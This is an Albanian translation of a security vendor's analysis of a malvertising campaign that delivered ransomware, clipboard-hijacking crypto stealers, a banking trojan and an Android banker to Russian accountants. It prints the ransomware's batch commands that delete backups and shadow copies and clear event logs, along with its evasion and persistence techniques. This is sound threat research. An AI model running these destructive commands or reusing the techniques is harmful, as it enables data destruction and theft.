Për të synuar kontabilistët në një sulm kibernetik, mund të përdorni dokumentet e punës që ata kërkojnë në internet. Kjo është afërsisht ajo që një grup kibernetik ka bërë gjatë muajve të fundit, duke shpërndarë prapaskenë të njohur. и , si dhe enkriptorë dhe softuer për vjedhjen e kriptomonedhave. Shumica e objektivave janë të vendosura në Rusi. Sulmi u krye duke vendosur reklama me qëllim të keq në Yandex.Direct. Viktimat e mundshme u drejtuan në një faqe interneti ku u kërkua të shkarkonin një skedar me qëllim të keq të maskuar si një model dokumenti. Yandex hoqi reklamat me qëllim të keq pas paralajmërimit tonë.
Kodi burimor i Buhtrap ka dalë në internet në të kaluarën, kështu që kushdo mund ta përdorë atë. Nuk kemi informacion në lidhje me disponueshmërinë e kodit RTM.
Në këtë postim do t'ju tregojmë se si sulmuesit shpërndanë malware duke përdorur Yandex.Direct dhe e pritën atë në GitHub. Postimi do të përfundojë me një analizë teknike të malware.
Buhtrap dhe RTM janë kthyer në biznes
Mekanizmi i përhapjes dhe viktimave
Ngarkesat e ndryshme të dorëzuara viktimave ndajnë një mekanizëm të përbashkët përhapjeje. Të gjithë skedarët me qëllim të keq të krijuar nga sulmuesit u vendosën në dy depo të ndryshme GitHub.
Në mënyrë tipike, depoja përmbante një skedar me qëllim të keq të shkarkueshëm, i cili ndryshonte shpesh. Meqenëse GitHub ju lejon të shikoni historinë e ndryshimeve në një depo, ne mund të shohim se çfarë malware u shpërnda gjatë një periudhe të caktuar. Për të bindur viktimën të shkarkojë skedarin keqdashës, u përdor faqja e internetit blanki-shabloni24[.]ru, e paraqitur në figurën e mësipërme.
Dizajni i faqes dhe të gjithë emrat e skedarëve me qëllim të keq ndjekin një koncept të vetëm - forma, shabllone, kontrata, mostra, etj. Duke marrë parasysh që softueri Buhtrap dhe RTM tashmë janë përdorur në sulmet ndaj kontabilistëve në të kaluarën, ne supozuam se strategjia në fushatën e re është e njëjtë. Pyetja e vetme është se si viktima arriti në faqen e internetit të sulmuesve.
infeksion
Të paktën disa viktima të mundshme që përfunduan në këtë faqe u tërhoqën nga reklamat me qëllim të keq. Më poshtë është një shembull URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Siç mund ta shihni nga lidhja, baneri u postua në forumin legjitim të kontabilitetit bb.f2[.]kz. Është e rëndësishme të theksohet se banderolat u shfaqën në faqe të ndryshme, të gjitha kishin të njëjtin ID të fushatës (blanki_rsya) dhe shumica e tyre lidheshin me shërbimet e kontabilitetit ose të ndihmës ligjore. URL-ja tregon se viktima e mundshme përdori kërkesën "shkarko formularin e faturës", e cila mbështet hipotezën tonë të sulmeve të synuara. Më poshtë janë faqet ku u shfaqën banderolat dhe pyetjet përkatëse të kërkimit.
- shkarko formularin e faturës – bb.f2[.]kz
- mostër e kontratës - Ipopen[.]ru
- mostra e ankesës së aplikimit - 77metrov[.]ru
- formulari i marrëveshjes - blank-dogovor-kupli-prodazhi[.]ru
- mostër e kërkesës gjyqësore - zen.yandex[.]ru
- mostër e ankesës - yurday[.]ru
- mostra e formularëve të kontratës – Regforum[.]ru
- formulari i kontratës – asistentus[.]ru
- mostër e marrëveshjes së apartamentit – napravah[.]com
- mostra të kontratave juridike - avito[.]ru
Faqja blanki-shabloni24[.]ru mund të jetë konfiguruar për të kaluar një vlerësim të thjeshtë vizual. Në mënyrë tipike, një reklamë që tregon një sit me pamje profesionale me një lidhje me GitHub nuk duket si diçka e keqe. Për më tepër, sulmuesit ngarkuan skedarë me qëllim të keq në depo vetëm për një periudhë të kufizuar, me gjasë gjatë fushatës. Shumicën e kohës, depoja e GitHub përmbante një arkiv zip bosh ose një skedar bosh EXE. Kështu, sulmuesit mund të shpërndanin reklama përmes Yandex.Direct në faqet që ka shumë të ngjarë të vizitoheshin nga kontabilistët që erdhën në përgjigje të pyetjeve specifike të kërkimit.
Më pas, le të shohim ngarkesat e ndryshme të shpërndara në këtë mënyrë.
Analiza e ngarkesës
Kronologjia e shpërndarjes
Fushata dashakeqe filloi në fund të tetorit 2018 dhe është aktive në momentin e shkrimit. Meqenëse i gjithë depoja ishte e disponueshme publikisht në GitHub, ne përpiluam një afat kohor të saktë të shpërndarjes së gjashtë familjeve të ndryshme malware (shih figurën më poshtë). Ne kemi shtuar një linjë që tregon se kur u zbulua lidhja e bannerit, e matur nga telemetria ESET, për krahasim me historinë e git. Siç mund ta shihni, kjo lidhet mirë me disponueshmërinë e ngarkesës në GitHub. Mospërputhja në fund të shkurtit mund të shpjegohet me faktin se ne nuk kishim një pjesë të historisë së ndryshimeve sepse depoja u hoq nga GitHub përpara se ta merrnim atë të plotë.
Figura 1. Kronologjia e shpërndarjes së malware.
Certifikatat e nënshkrimit të kodit
Fushata përdori certifikata të shumta. Disa u nënshkruan nga më shumë se një familje malware, gjë që tregon më tej se mostra të ndryshme i përkisnin të njëjtës fushatë. Pavarësisht disponueshmërisë së çelësit privat, operatorët nuk nënshkruan sistematikisht binarët dhe nuk e përdorën çelësin për të gjitha mostrat. Në fund të shkurtit 2019, sulmuesit filluan të krijojnë nënshkrime të pavlefshme duke përdorur një certifikatë në pronësi të Google për të cilën nuk kishin çelësin privat.
Të gjitha certifikatat e përfshira në fushatë dhe familjet e malware që ata nënshkruajnë janë renditur në tabelën më poshtë.
Ne kemi përdorur gjithashtu këto certifikata të nënshkrimit të kodit për të krijuar lidhje me familje të tjera malware. Për shumicën e certifikatave, ne nuk gjetëm mostra që nuk u shpërndanë përmes një depoje GitHub. Megjithatë, certifikata TOV "MARIYA" u përdor për të nënshkruar malware që i përkasin botnet-it , adware dhe minatorë. Nuk ka gjasa që ky malware të ketë lidhje me këtë fushatë. Me shumë mundësi, certifikata është blerë në rrjetin e errët.
Win32/Filecoder.Buhtrap
Komponenti i parë që tërhoqi vëmendjen tonë ishte Win32/Filecoder.Buhtrap i sapo zbuluar. Ky është një skedar binar i Delphi që ndonjëherë paketohet. Ai u shpërnda kryesisht në shkurt-mars 2019. Ai sillet siç i ka hije një programi ransomware - kërkon disqet lokale dhe dosjet e rrjetit dhe kodon skedarët e zbuluar. Nuk ka nevojë për një lidhje interneti për t'u komprometuar sepse nuk kontakton serverin për të dërguar çelësat e enkriptimit. Në vend të kësaj, ai shton një "token" në fund të mesazhit të shpërblesës dhe sugjeron përdorimin e emailit ose Bitmessage për të kontaktuar operatorët.
Për të enkriptuar sa më shumë burime të ndjeshme që të jetë e mundur, Filecoder.Buhtrap drejton një lidhje të krijuar për të mbyllur softuerin kyç që mund të ketë mbajtës të skedarëve të hapur që përmbajnë informacione të vlefshme që mund të ndërhyjnë në kriptim. Proceset e synuara janë kryesisht sistemet e menaxhimit të bazës së të dhënave (DBMS). Përveç kësaj, Filecoder.Buhtrap fshin skedarët e regjistrave dhe kopjet rezervë për të vështirësuar rikuperimin e të dhënave. Për ta bërë këtë, ekzekutoni skriptin e grupit më poshtë.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap përdor një shërbim të ligjshëm në internet IP Logger i krijuar për të mbledhur informacione rreth vizitorëve të faqes në internet. Kjo synon të gjurmojë viktimat e ransomware, e cila është përgjegjësi e linjës së komandës:
mshta.exe "javascript:document.write('');"
Skedarët për enkriptim zgjidhen nëse nuk përputhen me tre lista përjashtimesh. Së pari, skedarët me shtesat e mëposhtme nuk janë të koduara: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys dhe .bat. Së dyti, përjashtohen të gjithë skedarët për të cilët shtegu i plotë përmban vargje direktorie nga lista e mëposhtme.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Së treti, emra të caktuar skedarësh janë gjithashtu të përjashtuar nga enkriptimi, midis tyre edhe emri i skedarit të mesazhit të shpërblesës. Lista është paraqitur më poshtë. Natyrisht, të gjitha këto përjashtime kanë për qëllim të mbajnë makinën në punë, por me teknikë minimale.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Skema e enkriptimit të skedarëve
Pasi të ekzekutohet, malware gjeneron një çift çelësash RSA 512-bit. Eksponenti privat (d) dhe moduli (n) më pas kodohen me një çelës publik 2048-bit të koduar (eksponenti publik dhe moduli), i mbushur me zlib dhe kodohet me bazë64. Kodi përgjegjës për këtë është paraqitur në Figurën 2.
Figura 2. Rezultati i dekompilimit Hex-Rays të procesit të gjenerimit të çiftit të çelësave 512-bit RSA.
Më poshtë është një shembull i tekstit të thjeshtë me një çelës privat të krijuar, i cili është një shenjë e bashkangjitur me mesazhin e shpërblesës.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Çelësi publik i sulmuesve është dhënë më poshtë.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Skedarët janë të koduar duke përdorur AES-128-CBC me një çelës 256-bit. Për çdo skedar të koduar, krijohet një çelës i ri dhe një vektor i ri inicializimi. Informacioni kryesor shtohet në fund të skedarit të koduar. Le të shqyrtojmë formatin e skedarit të koduar.
Skedarët e koduar kanë kokën e mëposhtme:
Të dhënat e skedarit burimor me shtimin e vlerës magjike VEGA janë të koduara në 0x5000 bajtët e parë. Të gjitha informacionet e deshifrimit i bashkëngjiten një skedari me strukturën e mëposhtme:
- Shënuesi i madhësisë së skedarit përmban një shenjë që tregon nëse skedari është më i madh se 0x5000 bajt në madhësi
- Pika e çelësit AES = ZlibCompress (RSAEncrypt (çelësi AES + IV, çelësi publik i çiftit të çelësave RSA të krijuar))
- Pika e çelësit RSA = ZlibCompress (RSAEncrypt (çelës privat i krijuar RSA, çelës publik RSA me kod të fortë))
Win32/ClipBanker
Win32/ClipBanker është një komponent që është shpërndarë me ndërprerje nga fundi i tetorit deri në fillim të dhjetorit 2018. Roli i tij është të monitorojë përmbajtjen e kujtesës, ai kërkon adresat e kuletave të kriptomonedhave. Pasi ka përcaktuar adresën e portofolit të synuar, ClipBanker e zëvendëson atë me një adresë që besohet se i përket operatorëve. Mostrat që ne studiuam nuk ishin as të mbyllura dhe as të turbulluara. I vetmi mekanizëm i përdorur për të maskuar sjelljen është enkriptimi i vargut. Adresat e portofolit të operatorit janë të koduara duke përdorur RC4. Kriptovalutat e synuara janë Bitcoin, Bitcoin cash, Dogecoin, Ethereum dhe Ripple.
Gjatë periudhës që malware po përhapej në kuletat Bitcoin të sulmuesve, një sasi e vogël u dërgua në VTS, gjë që vë në dyshim suksesin e fushatës. Për më tepër, nuk ka asnjë provë që sugjeron se këto transaksione ishin fare të lidhura me ClipBanker.
Win32/RTM
Komponenti Win32/RTM u shpërnda për disa ditë në fillim të marsit 2019. RTM është një bankier trojan i shkruar në Delphi, që synon sistemet bankare në distancë. Në vitin 2017, studiuesit e ESET publikuan i këtij programi, përshkrimi është ende i rëndësishëm. Në janar 2019, Palo Alto Networks u lëshua gjithashtu .
Ngarkues Buhtrap
Për ca kohë, një shkarkues ishte i disponueshëm në GitHub që nuk ishte i ngjashëm me mjetet e mëparshme Buhtrap. Ai i drejtohet https://94.100.18[.]67/RSS.php?<some_id> për të marrë fazën tjetër dhe e ngarkon atë direkt në memorie. Mund të dallojmë dy sjellje të kodit të fazës së dytë. Në URL-në e parë, RSS.php kaloi direkt në prapavijën e Buhtrap - kjo derë e pasme është shumë e ngjashme me atë të disponueshme pas zbulimit të kodit burimor.
Interesante, ne shohim disa fushata me backdoor Buhtrap, dhe ato supozohet se drejtohen nga operatorë të ndryshëm. Në këtë rast, ndryshimi kryesor është se dera e pasme ngarkohet drejtpërdrejt në memorie dhe nuk përdor skemën e zakonshme me procesin e vendosjes së DLL për të cilën folëm . Përveç kësaj, operatorët ndryshuan çelësin RC4 të përdorur për të kriptuar trafikun e rrjetit në serverin C&C. Në shumicën e fushatave që kemi parë, operatorët nuk u mërzitën ta ndryshonin këtë çelës.
Sjellja e dytë, më komplekse ishte se URL-ja RSS.php iu kalua një ngarkuesi tjetër. Ai zbatoi disa turbullira, të tilla si rindërtimi i tabelës dinamike të importit. Qëllimi i ngarkuesit është të kontaktojë serverin C&C [.]com/api/F27F84EDA4D13B15/2, dërgoni regjistrat dhe prisni një përgjigje. Ai e përpunon përgjigjen si një pikë, e ngarkon atë në memorie dhe e ekzekuton atë. Ngarkesa që pamë duke ekzekutuar këtë ngarkues ishte e njëjta derë e pasme e Buhtrap, por mund të ketë komponentë të tjerë.
Android/Spy.Banker
Është interesante se një komponent për Android u gjet gjithashtu në depon e GitHub. Ai ka qenë në degën kryesore vetëm një ditë - 1 nëntor 2018. Përveç postimit në GitHub, telemetria ESET nuk gjen asnjë provë për shpërndarjen e këtij malware.
Komponenti u organizua si një paketë aplikacioni Android (APK). Është shumë e turbullt. Sjellja me qëllim të keq fshihet në një JAR të koduar të vendosur në APK. Është i koduar me RC4 duke përdorur këtë çelës:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
I njëjti çelës dhe algoritëm përdoren për të enkriptuar vargjet. JAR ndodhet në APK_ROOT + image/files. 4 bajtët e parë të skedarit përmbajnë gjatësinë e JAR-it të koduar, i cili fillon menjëherë pas fushës së gjatësisë.
Pasi e deshifruam skedarin, zbuluam se ishte Anubis - më parë bankier për Android. Malware ka karakteristikat e mëposhtme:
- regjistrim me mikrofon
- duke marrë pamje nga ekrani
- marrjen e koordinatave GPS
- keylogger
- kriptimi i të dhënave të pajisjes dhe kërkesa për shpërblim
- spamming
Është interesante se bankieri përdori Twitter-in si një kanal komunikimi rezervë për të marrë një server tjetër C&C. Mostra që analizuam përdorte llogarinë @JonesTrader, por në kohën e analizës ajo ishte tashmë e bllokuar.
Bankeri përmban një listë të aplikacioneve të synuara në pajisjen Android. Është më e gjatë se lista e marrë në studimin e Sophos. Lista përfshin shumë aplikacione bankare, programe të blerjeve online si Amazon dhe eBay, dhe shërbime të kriptomonedhave.
MSIL/ClipBanker.IH
Komponenti i fundit i shpërndarë si pjesë e kësaj fushate ishte ekzekutuesi .NET Windows, i cili u shfaq në mars 2019. Shumica e versioneve të studiuara ishin të paketuara me ConfuserEx v1.0.0. Ashtu si ClipBanker, ky komponent përdor clipboard. Qëllimi i tij është një gamë e gjerë kriptomonedhash, si dhe oferta në Steam. Për më tepër, ai përdor shërbimin IP Logger për të vjedhur çelësin privat WIF të Bitcoin.
Mekanizmat Mbrojtës
Përveç përfitimeve që ofron ConfuserEx në parandalimin e korrigjimit, hedhjes dhe manipulimit, komponenti përfshin aftësinë për të zbuluar produkte antivirus dhe makina virtuale.
Për të verifikuar që funksionon në një makinë virtuale, malware përdor linjën e komandës së integruar të Windows WMI (WMIC) për të kërkuar informacionin e BIOS-it, përkatësisht:
wmic bios
Më pas programi analizon daljen e komandës dhe kërkon fjalë kyçe: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Për të zbuluar produktet antivirus, malware dërgon një kërkesë për Instrumentimin e Menaxhimit të Windows (WMI) në Qendrën e Sigurisë së Windows duke përdorur ManagementObjectSearcher API siç tregohet më poshtë. Pas dekodimit nga base64 thirrja duket si kjo:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figura 3. Procesi për identifikimin e produkteve antivirus.
Përveç kësaj, malware kontrollon nëse , një mjet për të mbrojtur kundër sulmeve të kujtesës dhe, nëse funksionon, pezullon të gjitha temat në atë proces, duke çaktivizuar kështu mbrojtjen.
Qëndrueshmëria
Versioni i malware që kemi studiuar kopjohet vetë %APPDATA%googleupdater.exe dhe vendos atributin "fshehur" për direktorinë google. Pastaj ajo ndryshon vlerën SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell në regjistrin e Windows dhe shton shtegun updater.exe. Në këtë mënyrë, malware do të ekzekutohet sa herë që përdoruesi regjistrohet.
Sjellje keqdashëse
Ashtu si ClipBanker, malware monitoron përmbajtjen e kujtesës dhe kërkon adresat e portofolit të kriptomonedhave dhe kur gjendet, e zëvendëson atë me një nga adresat e operatorit. Më poshtë është një listë e adresave të synuara bazuar në atë që gjendet në kod.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Për çdo lloj adrese ekziston një shprehje e rregullt përkatëse. Vlera STEAM_URL përdoret për të sulmuar sistemin Steam, siç mund të shihet nga shprehja e rregullt që përdoret për të përcaktuar në buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kanali i eksfiltrimit
Përveç zëvendësimit të adresave në tampon, malware synon çelësat privatë WIF të kuletave Bitcoin, Bitcoin Core dhe Electrum Bitcoin. Programi përdor plogger.org si një kanal exfiltrimi për të marrë çelësin privat WIF. Për ta bërë këtë, operatorët shtojnë të dhënat e çelësit privat në kokën e përdoruesit-Agjent HTTP, siç tregohet më poshtë.
Figura 4. Konsola IP Logger me të dhëna dalëse.
Operatorët nuk përdorën iplogger.org për të shfrytëzuar kuletat. Ata ndoshta iu drejtuan një metode tjetër për shkak të kufirit prej 255 karakteresh në fushë User-Agentshfaqet në ndërfaqen e internetit IP Logger. Në mostrat që studiuam, serveri tjetër i daljes u ruajt në variablin e mjedisit DiscordWebHook. Çuditërisht, kjo ndryshore mjedisore nuk është caktuar askund në kod. Kjo sugjeron që malware është ende në zhvillim dhe ndryshorja i është caktuar makinës së testimit të operatorit.
Ka një shenjë tjetër që programi është në zhvillim e sipër. Skedari binar përfshin dy URL iplogger.org dhe të dyja kërkohen kur të dhënat ekfiltohen. Në një kërkesë për një nga këto URL, vlera në fushën Referer paraprihet nga "DEV /". Ne gjetëm gjithashtu një version që nuk ishte paketuar duke përdorur ConfuserEx, marrësi për këtë URL quhet DevFeedbackUrl. Bazuar në emrin e ndryshores së mjedisit, ne besojmë se operatorët po planifikojnë të përdorin shërbimin legjitim Discord dhe sistemin e tij të përgjimit në ueb për të vjedhur kuletat e kriptomonedhave.
Përfundim
Kjo fushatë është një shembull i përdorimit të shërbimeve legjitime të reklamave në sulmet kibernetike. Skema synon organizatat ruse, por ne nuk do të habiteshim të shihnim një sulm të tillë duke përdorur shërbime jo-ruse. Për të shmangur kompromisin, përdoruesit duhet të jenë të sigurt në reputacionin e burimit të softuerit që shkarkojnë.
Një listë e plotë e treguesve të kompromisit dhe atributeve MITER ATT&CK është në dispozicion në .
Burimi: www.habr.com